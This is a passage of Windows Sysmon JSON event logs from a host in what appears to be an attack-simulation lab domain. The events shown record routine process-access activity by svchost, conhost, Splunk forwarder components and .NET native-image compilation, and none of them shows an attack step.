05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7759,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7760,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7761,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7762,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7763,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7764,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.700\r\nSourceProcessGUID: {A837DB8D-0239-5F25-0000-00103F1E0500}\r\nSourceProcessId: 2768\r\nSourceThreadId: 2656\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-04CC-5F25-0000-0010CAAD1000}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.700","SourceProcessGUID":"{A837DB8D-0239-5F25-0000-00103F1E0500}","SourceProcessId":"2768","SourceThreadId":"2656","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-04CC-5F25-0000-0010CAAD1000}","TargetProcessId":"4996","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:53","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7765,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:53.840\r\nSourceProcessGUID: {A837DB8D-04D9-5F25-0000-0010C5801100}\r\nSourceProcessId: 4996\r\nSourceThreadId: 3544\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe\r\nTargetProcessGUID: {A837DB8D-0239-5F25-0000-001064190500}\r\nTargetProcessId: 2868\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:59:53.840","SourceProcessGUID":"{A837DB8D-04D9-5F25-0000-0010C5801100}","SourceProcessId":"4996","SourceThreadId":"3544","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe","TargetProcessGUID":"{A837DB8D-0239-5F25-0000-001064190500}","TargetProcessId":"2868","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e675|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+55e1a6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+6b453|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-powershell.exe+8e8530|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7766,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:59:54.184\r\nProcessGuid: {A837DB8D-04D8-5F25-0000-0010067C1100}\r\nProcessId: 2284\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8ec-0\\System.Speech.dll\r\nCreationUtcTime: 2020-08-01 05:59:54.184","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:59:54.184","ProcessGuid":"{A837DB8D-04D8-5F25-0000-0010067C1100}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\8ec-0\\System.Speech.dll","CreationUtcTime":"2020-08-01 05:59:54.184","EventReceivedTime":"2020-08-01 05:59:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:59:54","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7767,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:59:54.246\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-04DA-5F25-0000-0010EE821100}\r\nTargetProcessId: 1164\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Wi